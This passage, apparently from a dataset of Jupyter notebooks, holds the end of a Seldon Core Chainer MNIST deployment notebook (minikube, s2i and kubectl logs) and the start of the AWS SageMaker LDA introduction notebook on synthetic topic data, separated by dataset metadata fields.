occurred:\n\nTraceback (most recent call last):\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/bin/seldon-core-tester\", line 10, in <module>\n sys.exit(main())\n File 
\"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/seldon_core/microservice_tester.py\", line 258, in main\n run_predict(args)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/seldon_core/microservice_tester.py\", line 225, in run_predict\n response = sc.microservice(data=batch, transport=transport, method=\"predict\", payload_type=payload_type, names=feature_names)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/seldon_core/seldon_client.py\", line 395, in microservice\n return microservice_api_rest_seldon_message(**k)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/seldon_core/seldon_client.py\", line 534, in microservice_api_rest_seldon_message\n data={\"json\": json.dumps(payload)})\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/requests/api.py\", line 116, in post\n return request('post', url, data=data, json=json, **kwargs)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/requests/api.py\", line 60, in request\n return session.request(method=method, url=url, **kwargs)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/requests/sessions.py\", line 533, in request\n resp = self.send(prep, **send_kwargs)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/requests/sessions.py\", line 646, in send\n r = adapter.send(request, **kwargs)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/requests/adapters.py\", line 516, in send\n raise ConnectionError(e, request=request)\nrequests.exceptions.ConnectionError: HTTPConnectionPool(host='0.0.0.0', port=5000): Max retries exceeded with url: /predict (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x1232a2050>: Failed to establish a new connection: [Errno 61] Connection refused'))\n" ], [ "!docker rm mnist_predictor --force", "Error: No such container: mnist_predictor\r\n" ] ], [ [ "# Test using Minikube\n\n**Due to a [minikube/s2i issue](https://github.com/SeldonIO/seldon-core/issues/253) you will need [s2i >= 1.1.13](https://github.com/openshift/source-to-image/releases/tag/v1.1.13)**", "_____no_output_____" ] ], [ [ "!minikube start --memory 4096 ", "😄 minikube v1.2.0 on darwin (amd64)\n🔥 Creating virtualbox VM (CPUs=2, Memory=4096MB, Disk=20000MB) ...\n🐳 Configuring environment for Kubernetes v1.15.0 on Docker 18.09.6\n🚜 Pulling images ...\n🚀 Launching Kubernetes ... \n⌛ Verifying: apiserver proxy etcd scheduler controller dns\n🏄 Done! kubectl is now configured to use \"minikube\"\n" ] ], [ [ "## Setup Seldon Core\n\nUse the setup notebook to [Setup Cluster](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Setup-Cluster) with [Ambassador Ingress](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Ambassador) and [Install Seldon Core](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Install-Seldon-Core). Instructions [also online](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html).", "_____no_output_____" ] ], [ [ "!eval $(minikube docker-env) && s2i build . seldonio/seldon-core-s2i-python3:1.3.0-dev chainer-mnist:0.1", "---> Installing application source...\n---> Installing dependencies ...\nLooking in links: /whl\nCollecting chainer==6.2.0 (from -r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. 
It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/2c/5a/86c50a0119a560a39d782c4cdd9b72927c090cc2e3f70336e01b19a5f97a/chainer-6.2.0.tar.gz (873kB)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.6/site-packages (from chainer==6.2.0->-r requirements.txt (line 1)) (41.0.1)\nCollecting typing<=3.6.6 (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/4a/bd/eee1157fc2d8514970b345d69cb9975dcd1e42cd7e61146ed841f6e68309/typing-3.6.6-py3-none-any.whl\nCollecting typing_extensions<=3.6.6 (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/62/4f/392a1fa2873e646f5990eb6f956e662d8a235ab474450c72487745f67276/typing_extensions-3.6.6-py3-none-any.whl\nCollecting filelock (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/93/83/71a2ee6158bb9f39a90c0dea1637f81d5eef866e188e1971a1b1ab01a35a/filelock-3.0.12-py3-none-any.whl\nRequirement already satisfied: numpy>=1.9.0 in /usr/local/lib/python3.6/site-packages (from chainer==6.2.0->-r requirements.txt (line 1)) (1.16.4)\nCollecting protobuf<3.8.0rc1,>=3.0.0 (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/5a/aa/a858df367b464f5e9452e1c538aa47754d467023850c00b000287750fa77/protobuf-3.7.1-cp36-cp36m-manylinux1_x86_64.whl (1.2MB)\nRequirement already satisfied: six>=1.9.0 in /usr/local/lib/python3.6/site-packages (from chainer==6.2.0->-r requirements.txt (line 1)) (1.12.0)\nBuilding wheels for collected packages: chainer\nBuilding wheel for chainer (setup.py): started\nBuilding wheel for chainer (setup.py): finished with status 'done'\nStored in directory: /root/.cache/pip/wheels/2e/be/c5/6ee506abcaa4a53106f7d7671bbee8b4e5243bc562a9d32ad1\nSuccessfully built chainer\nInstalling collected packages: typing, typing-extensions, filelock, protobuf, chainer\nFound existing installation: protobuf 3.8.0\nUninstalling protobuf-3.8.0:\nSuccessfully uninstalled protobuf-3.8.0\nSuccessfully installed chainer-6.2.0 filelock-3.0.12 protobuf-3.7.1 typing-3.6.6 typing-extensions-3.6.6\nWARNING: Url '/whl' is ignored. 
It is either a non-existing path or lacks a specific scheme.\nWARNING: You are using pip version 19.1, however version 19.2.2 is available.\nYou should consider upgrading via the 'pip install --upgrade pip' command.\nBuild completed successfully\n" ], [ "!kubectl create -f chainer_mnist_deployment.json", "seldondeployment.machinelearning.seldon.io/seldon-deployment-example created\r\n" ], [ "!kubectl rollout status deploy/chainer-mnist-deployment-chainer-mnist-predictor-76478b2", "Waiting for deployment \"chainer-mnist-deployment-chainer-mnist-predictor-76478b2\" rollout to finish: 0 of 1 updated replicas are available...\ndeployment \"chainer-mnist-deployment-chainer-mnist-predictor-76478b2\" successfully rolled out\n" ], [ "!seldon-core-api-tester contract.json `minikube ip` `kubectl get svc ambassador -o jsonpath='{.spec.ports[0].nodePort}'` \\\n seldon-deployment-example --namespace default -p", "/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:516: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint8 = np.dtype([(\"qint8\", np.int8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:517: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint8 = np.dtype([(\"quint8\", np.uint8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:518: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint16 = np.dtype([(\"qint16\", np.int16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:519: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint16 = np.dtype([(\"quint16\", np.uint16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:520: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint32 = np.dtype([(\"qint32\", np.int32, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:525: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n np_resource = np.dtype([(\"resource\", np.ubyte, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:541: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint8 = np.dtype([(\"qint8\", np.int8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:542: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint8 = np.dtype([(\"quint8\", np.uint8, 
1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:543: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint16 = np.dtype([(\"qint16\", np.int16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:544: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint16 = np.dtype([(\"quint16\", np.uint16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:545: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint32 = np.dtype([(\"qint32\", np.int32, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:550: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n np_resource = np.dtype([(\"resource\", np.ubyte, 1)])\n----------------------------------------\nSENDING NEW REQUEST:\n\n[[0.64 0.213 0.028 0.604 0.586 0.076 0.629 0.568 0.806 0.931 0.266 0.098\n 0.526 0.336 0.569 0.965 0.157 0.401 0.15 0.405 0.594 0.21 0.699 0.085\n 0.314 0.467 0.303 0.384 0.788 0.135 0.349 0.467 0.025 0.525 0.767 0.819\n 0.275 0.212 0.784 0.448 0.808 0.582 0.939 0.165 0.761 0.272 0.332 0.321\n 0.005 0.921 0.285 0.181 0.161 0.948 0.148 0.788 0.664 0.65 0.795 0.548\n 0.754 0.407 0.057 0.429 0.569 0.538 0.295 0.4 0.581 0.569 0.299 0.066\n 0.456 0.118 0.983 0.93 0.316 0.865 0.492 0.048 0.505 0.573 0.595 0.13\n 0.595 0.595 0.474 0.334 0.708 0.25 0.183 0.391 0.268 0.252 0.366 0.029\n 0.676 0.869 0.12 0.737 0.502 0.868 0.846 0.891 0.578 0.598 0.984 0.543\n 0.515 0.081 0.998 0.976 0.611 0.492 0.494 0.985 0.443 0.246 0.252 0.871\n 0.615 0.885 0.903 0.254 0.651 0.412 0.645 0.608 0.921 0.5 0.18 0.845\n 0.91 0.601 0.782 0.27 0.643 0.671 0.273 0.37 0.454 0.08 0.854 0.439\n 0.912 0.709 0.703 0.817 0.381 0.963 0.057 0.015 0.126 0.686 0.284 0.463\n 0.231 0.332 0.932 0.804 0.538 0.039 0.12 0.992 0.436 0.791 0.261 0.842\n 0.901 0.208 0.578 0.423 0.657 0.293 0.633 0.45 0.609 0.715 0.149 0.244\n 0.026 0.332 0.525 0.157 0.749 0.88 0.713 0.405 0.473 0.01 0.038 0.807\n 0.934 0.157 0.141 0.155 0.124 0.781 0.738 0.018 0.42 0.635 0.867 0.925\n 0.398 0.505 0.695 0.429 0.174 0.327 0.123 0.967 0.378 0.224 0.393 0.053\n 0.344 0.731 0.02 0.848 0.079 0.814 0.023 0.087 0.578 0.642 0.18 0.563\n 0.276 0.491 0.021 0.719 0.85 0.156 0.031 0.506 0.271 0.095 0.186 0.002\n 0.799 0.138 0.734 0.925 0.881 0.187 0.559 0.946 0.826 0.488 0.744 0.322\n 0.333 0.322 0.665 0.032 0.663 0.754 0.495 0.569 0.917 0.167 0.168 0.409\n 0.369 0.363 0.23 0.961 0.201 0.463 0.565 0.834 0.431 0.848 0.742 0.436\n 0.061 0.656 0.3 0.128 0.485 0.78 0.617 0.082 0.396 0.416 0.673 0.961\n 0.727 0.986 0.222 0.909 0.898 0.144 0.639 0.046 0.101 0.546 0.782 0.069\n 0.672 0.824 0.861 0.981 0.003 0.591 0.303 0.384 0.67 0.7 0.834 0.475\n 0.932 0.949 0.938 0.945 0.368 0.522 0.833 0.045 0.452 0.068 0.165 0.569\n 0.44 0.702 0.727 0.069 0.686 0.262 0.891 0.547 0.994 0.454 0.947 0.364\n 0.154 0.322 0.571 0.19 0.476 0.925 0.871 0.605 0.442 0.585 0.544 0.316\n 0.915 0.253 0.973 0.501 0.402 
0.96 0.206 0.501 0.37 0.463 0.904 0.981\n 0.969 0.877 0.724 0.5 0.447 0.499 0.443 0.349 0.79 0.051 0.384 0.27\n 0.094 0.774 0.742 0.16 0.517 0.266 0.908 0.796 0.862 0.987 0.939 0.909\n 0.962 0.587 0.964 0.159 0.029 0.952 0.416 0.72 0.346 0.257 0.152 0.233\n 0.862 0.457 0.153 0.076 0.105 0.634 0.652 0.435 0.757 0.985 0.487 0.114\n 0.95 0.217 0.877 0.483 0.302 0.929 0.856 0.768 0.223 0.006 0.841 0.565\n 0.611 0.407 0.71 0.588 0.654 0.197 0.506 0.938 0.779 0.387 0.007 0.482\n 0.523 0.993 0.671 0.044 0.497 0.71 0.418 0.06 0.114 0.082 0.811 0.083\n 0.773 0.134 0.87 0.414 0.787 0.972 0.132 0.047 0.593 0.502 0.15 0.042\n 0.363 0.311 0.17 0.895 0.569 0.774 0.006 0.408 0.92 0.753 0.543 0.279\n 0.911 0.314 0.195 0.538 0.977 0.606 0.954 0.378 0.397 0.261 0.085 0.656\n 0.978 0.598 0.216 0.832 0.105 0.958 0.185 0.81 0.444 0.308 0.013 0.176\n 0.603 0.383 0.671 0.436 0.981 0.072 0.713 0.349 0.962 0.055 0.315 0.417\n 0.052 0.076 0.198 0.786 0.397 0.757 0.145 0.539 0.671 0.583 0.42 0.575\n 0.563 0.286 0.788 0.481 0.403 0.85 0.864 0.945 0.427 0.511 0.268 0.091\n 0.049 0.611 0.137 0.58 0.281 0.057 0.453 0.461 0.895 0.701 0.662 0.599\n 0.967 0.562 0.295 0.6 0.742 0.909 0.69 0.383 0.553 0.078 0.949 0.109\n 0.771 0.083 0.712 0.514 0.549 0.403 0.575 0.494 0.31 0.307 0.091 0.874\n 0.591 0.315 0.199 0.372 0.131 0.905 0.32 0.284 0.516 0.055 0.832 0.042\n 0.927 0.667 0.273 0.426 0.054 0.799 0.356 0.564 0.223 0.772 0.79 0.628\n 0.893 0.512 0.523 0.518 0.48 0.869 0.49 0.416 0.775 0.864 0.921 0.968\n 0.109 0.812 0.943 0.042 0.179 0.943 0.324 0.079 0.017 0.226 0.848 0.803\n 0.873 0.834 0.696 0.582 0.125 0.042 0.917 0.909 0.491 0.5 0.101 0.779\n 0.65 0.424 0.94 0.582 0.706 0.935 0.286 0.057 0.544 0.198 0.893 0.537\n 0.405 0.91 0.908 0.297 0.288 0.368 0.654 0.347 0.002 0.677 0.32 0.691\n 0.17 0.133 0.586 0.857 0.001 0.639 0.223 0.164 0.689 0.97 0.913 0.947\n 0.962 0.44 0.201 0.343 0.493 0.662 0.728 0.295 0.445 0.739 0.764 0.955\n 0.206 0.298 0.996 0.835 0.983 0.033 0.801 0.284 0.621 0.941 0.293 0.865\n 0.158 0.788 0.681 0.613 0.705 0.753 0.006 0.175 0.414 0.299 0.116 0.67\n 0.66 0.845 0.905 0.369 0.11 0.841 0.717 0.348 0.537 0.116 0.024 0.575\n 0.211 0.427 0.84 0.447 0.056 0.427 0.39 0.424 0.48 0.738 0.698 0.377\n 0.143 0.242 0.877 0.238 0.188 0.786 0.965 0.112 0.952 0.679 0.916 0.13\n 0.882 0.353 0.433 0.608 0.297 0.558 0.663 0.646 0.185 0.91 0.131 0.217\n 0.549 0.759 0.087 0.96 0.11 0.613 0.643 0.218 0.126 0.535 0.751 0.097\n 0.681 0.782 0.367 0.197 0.05 0.742 0.623 0.763 0.625 0.317 0.364 0.879\n 0.445 0.751 0.87 0.727 0.879 0.035 0.412 0.907 0.895 0.923 0.373 0.22\n 0.21 0.176 0.182 0.821]]\n" ], [ "!minikube delete", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
cb1d076ea24c5819fb4ddecc6dc5fedc04e4f0f3
24,126
ipynb
Jupyter Notebook
introduction_to_amazon_algorithms/lda_topic_modeling/LDA-Introduction.ipynb
Amirosimani/amazon-sagemaker-examples
bc35e7a9da9e2258e77f98098254c2a8e308041a
[ "Apache-2.0" ]
2,610
2020-10-01T14:14:53.000Z
2022-03-31T18:02:31.000Z
introduction_to_amazon_algorithms/lda_topic_modeling/LDA-Introduction.ipynb
Amirosimani/amazon-sagemaker-examples
bc35e7a9da9e2258e77f98098254c2a8e308041a
[ "Apache-2.0" ]
1,959
2020-09-30T20:22:42.000Z
2022-03-31T23:58:37.000Z
introduction_to_amazon_algorithms/lda_topic_modeling/LDA-Introduction.ipynb
Amirosimani/amazon-sagemaker-examples
bc35e7a9da9e2258e77f98098254c2a8e308041a
[ "Apache-2.0" ]
2,052
2020-09-30T22:11:46.000Z
2022-03-31T23:02:51.000Z
39.038835
888
0.641424
[ [ [ "# An Introduction to SageMaker LDA\n\n***Finding topics in synthetic document data using Spectral LDA algorithms.***\n\n---\n\n1. [Introduction](#Introduction)\n1. [Setup](#Setup)\n1. [Training](#Training)\n1. [Inference](#Inference)\n1. [Epilogue](#Epilogue)", "_____no_output_____" ], [ "# Introduction\n***\n\nAmazon SageMaker LDA is an unsupervised learning algorithm that attempts to describe a set of observations as a mixture of distinct categories. Latent Dirichlet Allocation (LDA) is most commonly used to discover a user-specified number of topics shared by documents within a text corpus. Here each observation is a document, the features are the presence (or occurrence count) of each word, and the categories are the topics. Since the method is unsupervised, the topics are not specified up front, and are not guaranteed to align with how a human may naturally categorize documents. The topics are learned as a probability distribution over the words that occur in each document. Each document, in turn, is described as a mixture of topics.\n\nIn this notebook we will use the Amazon SageMaker LDA algorithm to train an LDA model on some example synthetic data. We will then use this model to classify (perform inference on) the data. The main goals of this notebook are to,\n\n* learn how to obtain and store data for use in Amazon SageMaker,\n* create an AWS SageMaker training job on a data set to produce an LDA model,\n* use the LDA model to perform inference with an Amazon SageMaker endpoint.\n\nThe following are ***not*** goals of this notebook:\n\n* understand the LDA model,\n* understand how the Amazon SageMaker LDA algorithm works,\n* interpret the meaning of the inference output\n\nIf you would like to know more about these things take a minute to run this notebook and then check out the SageMaker LDA Documentation and the **LDA-Science.ipynb** notebook.", "_____no_output_____" ] ], [ [ "%matplotlib inline\n\nimport os, re\n\nimport boto3\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nnp.set_printoptions(precision=3, suppress=True)\n\n# some helpful utility functions are defined in the Python module\n# \"generate_example_data\" located in the same directory as this\n# notebook\nfrom generate_example_data import generate_griffiths_data, plot_lda, match_estimated_topics\n\n# accessing the SageMaker Python SDK\nimport sagemaker\nfrom sagemaker.amazon.common import RecordSerializer\nfrom sagemaker.serializers import CSVSerializer\nfrom sagemaker.deserializers import JSONDeserializer", "_____no_output_____" ] ], [ [ "# Setup\n\n***\n\n*This notebook was created and tested on an ml.m4.xlarge notebook instance.*\n\nBefore we do anything at all, we need data! We also need to setup our AWS credentials so that AWS SageMaker can store and access data. In this section we will do four things:\n\n1. [Setup AWS Credentials](#SetupAWSCredentials)\n1. [Obtain Example Dataset](#ObtainExampleDataset)\n1. [Inspect Example Data](#InspectExampleData)\n1. [Store Data on S3](#StoreDataonS3)", "_____no_output_____" ], [ "## Setup AWS Credentials\n\nWe first need to specify some AWS credentials; specifically data locations and access roles. This is the only cell of this notebook that you will need to edit. 
In particular, we need the following data:\n\n* `bucket` - An S3 bucket accessible by this account.\n * Used to store input training data and model data output.\n * Should be within the same region as this notebook instance, training, and hosting.\n* `prefix` - The location in the bucket where this notebook's input and and output data will be stored. (The default value is sufficient.)\n* `role` - The IAM Role ARN used to give training and hosting access to your data.\n * See documentation on how to create these.\n * The script below will try to determine an appropriate Role ARN.", "_____no_output_____" ] ], [ [ "from sagemaker import get_execution_role\n\nsession = sagemaker.Session()\nrole = get_execution_role()\nbucket = session.default_bucket()\nprefix = \"sagemaker/DEMO-lda-introduction\"\n\nprint(\"Training input/output will be stored in {}/{}\".format(bucket, prefix))\nprint(\"\\nIAM Role: {}\".format(role))", "_____no_output_____" ] ], [ [ "## Obtain Example Data\n\n\nWe generate some example synthetic document data. For the purposes of this notebook we will omit the details of this process. All we need to know is that each piece of data, commonly called a *\"document\"*, is a vector of integers representing *\"word counts\"* within the document. In this particular example there are a total of 25 words in the *\"vocabulary\"*.\n\n$$\n\\underbrace{w}_{\\text{document}} = \\overbrace{\\big[ w_1, w_2, \\ldots, w_V \\big] }^{\\text{word counts}},\n\\quad\nV = \\text{vocabulary size}\n$$\n\nThese data are based on that used by Griffiths and Steyvers in their paper [Finding Scientific Topics](http://psiexp.ss.uci.edu/research/papers/sciencetopics.pdf). For more information, see the **LDA-Science.ipynb** notebook.", "_____no_output_____" ] ], [ [ "print(\"Generating example data...\")\nnum_documents = 6000\nnum_topics = 5\nknown_alpha, known_beta, documents, topic_mixtures = generate_griffiths_data(\n num_documents=num_documents, num_topics=num_topics\n)\nvocabulary_size = len(documents[0])\n\n# separate the generated data into training and tests subsets\nnum_documents_training = int(0.9 * num_documents)\nnum_documents_test = num_documents - num_documents_training\n\ndocuments_training = documents[:num_documents_training]\ndocuments_test = documents[num_documents_training:]\n\ntopic_mixtures_training = topic_mixtures[:num_documents_training]\ntopic_mixtures_test = topic_mixtures[num_documents_training:]\n\nprint(\"documents_training.shape = {}\".format(documents_training.shape))\nprint(\"documents_test.shape = {}\".format(documents_test.shape))", "_____no_output_____" ] ], [ [ "## Inspect Example Data\n\n*What does the example data actually look like?* Below we print an example document as well as its corresponding known *topic-mixture*. A topic-mixture serves as the \"label\" in the LDA model. It describes the ratio of topics from which the words in the document are found.\n\nFor example, if the topic mixture of an input document $\\mathbf{w}$ is,\n\n$$\\theta = \\left[ 0.3, 0.2, 0, 0.5, 0 \\right]$$\n\nthen $\\mathbf{w}$ is 30% generated from the first topic, 20% from the second topic, and 50% from the fourth topic. For more information see **How LDA Works** in the SageMaker documentation as well as the **LDA-Science.ipynb** notebook.\n\nBelow, we compute the topic mixtures for the first few training documents. 
As we can see, each document is a vector of word counts from the 25-word vocabulary and its topic-mixture is a probability distribution across the five topics used to generate the sample dataset.", "_____no_output_____" ] ], [ [ "print(\"First training document =\\n{}\".format(documents[0]))\nprint(\"\\nVocabulary size = {}\".format(vocabulary_size))", "_____no_output_____" ], [ "print(\"Known topic mixture of first document =\\n{}\".format(topic_mixtures_training[0]))\nprint(\"\\nNumber of topics = {}\".format(num_topics))\nprint(\"Sum of elements = {}\".format(topic_mixtures_training[0].sum()))", "_____no_output_____" ] ], [ [ "Later, when we perform inference on the training data set we will compare the inferred topic mixture to this known one.\n\n---\n\nHuman beings are visual creatures, so it might be helpful to come up with a visual representation of these documents. In the below plots, each pixel of a document represents a word. The greyscale intensity is a measure of how frequently that word occurs. Below we plot the first few documents of the training set reshaped into 5x5 pixel grids.", "_____no_output_____" ] ], [ [ "%matplotlib inline\n\nfig = plot_lda(documents_training, nrows=3, ncols=4, cmap=\"gray_r\", with_colorbar=True)\nfig.suptitle(\"Example Document Word Counts\")\nfig.set_dpi(160)", "_____no_output_____" ] ], [ [ "## Store Data on S3\n\nA SageMaker training job needs access to training data stored in an S3 bucket. Although training can accept data of various formats we convert the documents MXNet RecordIO Protobuf format before uploading to the S3 bucket defined at the beginning of this notebook. We do so by making use of the SageMaker Python SDK utility `RecordSerializer`.", "_____no_output_____" ] ], [ [ "# convert documents_training to Protobuf RecordIO format\nrecordio_protobuf_serializer = RecordSerializer()\nfbuffer = recordio_protobuf_serializer.serialize(documents_training)\n\n# upload to S3 in bucket/prefix/train\nfname = \"lda.data\"\ns3_object = os.path.join(prefix, \"train\", fname)\nboto3.Session().resource(\"s3\").Bucket(bucket).Object(s3_object).upload_fileobj(fbuffer)\n\ns3_train_data = \"s3://{}/{}\".format(bucket, s3_object)\nprint(\"Uploaded data to S3: {}\".format(s3_train_data))", "_____no_output_____" ] ], [ [ "# Training\n\n***\n\nOnce the data is preprocessed and available in a recommended format the next step is to train our model on the data. There are number of parameters required by SageMaker LDA configuring the model and defining the computational environment in which training will take place.\n\nFirst, we specify a Docker container containing the SageMaker LDA algorithm. For your convenience, a region-specific container is automatically chosen for you to minimize cross-region data communication. 
Information about the locations of each SageMaker algorithm is available in the documentation.", "_____no_output_____" ] ], [ [ "from sagemaker.amazon.amazon_estimator import get_image_uri\n\n# select the algorithm container based on this notebook's current location\n\nregion_name = boto3.Session().region_name\ncontainer = get_image_uri(region_name, \"lda\")\n\nprint(\"Using SageMaker LDA container: {} ({})\".format(container, region_name))", "_____no_output_____" ] ], [ [ "Particular to a SageMaker LDA training job are the following hyperparameters:\n\n* **`num_topics`** - The number of topics or categories in the LDA model.\n * Usually, this is not known a priori.\n * In this example, howevever, we know that the data is generated by five topics.\n\n* **`feature_dim`** - The size of the *\"vocabulary\"*, in LDA parlance.\n * In this example, this is equal 25.\n\n* **`mini_batch_size`** - The number of input training documents.\n\n* **`alpha0`** - *(optional)* a measurement of how \"mixed\" are the topic-mixtures.\n * When `alpha0` is small the data tends to be represented by one or few topics.\n * When `alpha0` is large the data tends to be an even combination of several or many topics.\n * The default value is `alpha0 = 1.0`.\n\nIn addition to these LDA model hyperparameters, we provide additional parameters defining things like the EC2 instance type on which training will run, the S3 bucket containing the data, and the AWS access role. Note that,\n\n* Recommended instance type: `ml.c4`\n* Current limitations:\n * SageMaker LDA *training* can only run on a single instance.\n * SageMaker LDA does not take advantage of GPU hardware.\n * (The Amazon AI Algorithms team is working hard to provide these capabilities in a future release!)", "_____no_output_____" ] ], [ [ "# specify general training job information\nlda = sagemaker.estimator.Estimator(\n container,\n role,\n output_path=\"s3://{}/{}/output\".format(bucket, prefix),\n train_instance_count=1,\n train_instance_type=\"ml.c4.2xlarge\",\n sagemaker_session=session,\n)\n\n# set algorithm-specific hyperparameters\nlda.set_hyperparameters(\n num_topics=num_topics,\n feature_dim=vocabulary_size,\n mini_batch_size=num_documents_training,\n alpha0=1.0,\n)\n\n# run the training job on input data stored in S3\nlda.fit({\"train\": s3_train_data})", "_____no_output_____" ] ], [ [ "If you see the message\n\n> `===== Job Complete =====`\n\nat the bottom of the output logs then that means training sucessfully completed and the output LDA model was stored in the specified output path. You can also view information about and the status of a training job using the AWS SageMaker console. Just click on the \"Jobs\" tab and select training job matching the training job name, below:", "_____no_output_____" ] ], [ [ "print(\"Training job name: {}\".format(lda.latest_training_job.job_name))", "_____no_output_____" ] ], [ [ "# Inference\n\n***\n\nA trained model does nothing on its own. We now want to use the model we computed to perform inference on data. For this example, that means predicting the topic mixture representing a given document.\n\nWe create an inference endpoint using the SageMaker Python SDK `deploy()` function from the job we defined above. 
We specify the instance type where inference is computed as well as an initial number of instances to spin up.", "_____no_output_____" ] ], [ [ "lda_inference = lda.deploy(\n initial_instance_count=1,\n instance_type=\"ml.m4.xlarge\", # LDA inference may work better at scale on ml.c4 instances\n)", "_____no_output_____" ] ], [ [ "Congratulations! You now have a functioning SageMaker LDA inference endpoint. You can confirm the endpoint configuration and status by navigating to the \"Endpoints\" tab in the AWS SageMaker console and selecting the endpoint matching the endpoint name, below: ", "_____no_output_____" ] ], [ [ "print(\"Endpoint name: {}\".format(lda_inference.endpoint_name))", "_____no_output_____" ] ], [ [ "With this realtime endpoint at our fingertips we can finally perform inference on our training and test data.\n\nWe can pass a variety of data formats to our inference endpoint. In this example we will demonstrate passing CSV-formatted data. Other available formats are JSON-formatted, JSON-sparse-formatter, and RecordIO Protobuf. We make use of the SageMaker Python SDK utilities `CSVSerializer` and `JSONDeserializer` when configuring the inference endpoint.", "_____no_output_____" ] ], [ [ "lda_inference.serializer = CSVSerializer()\nlda_inference.deserializer = JSONDeserializer()", "_____no_output_____" ] ], [ [ "We pass some test documents to the inference endpoint. Note that the serializer and deserializer will atuomatically take care of the datatype conversion from Numpy NDArrays.", "_____no_output_____" ] ], [ [ "results = 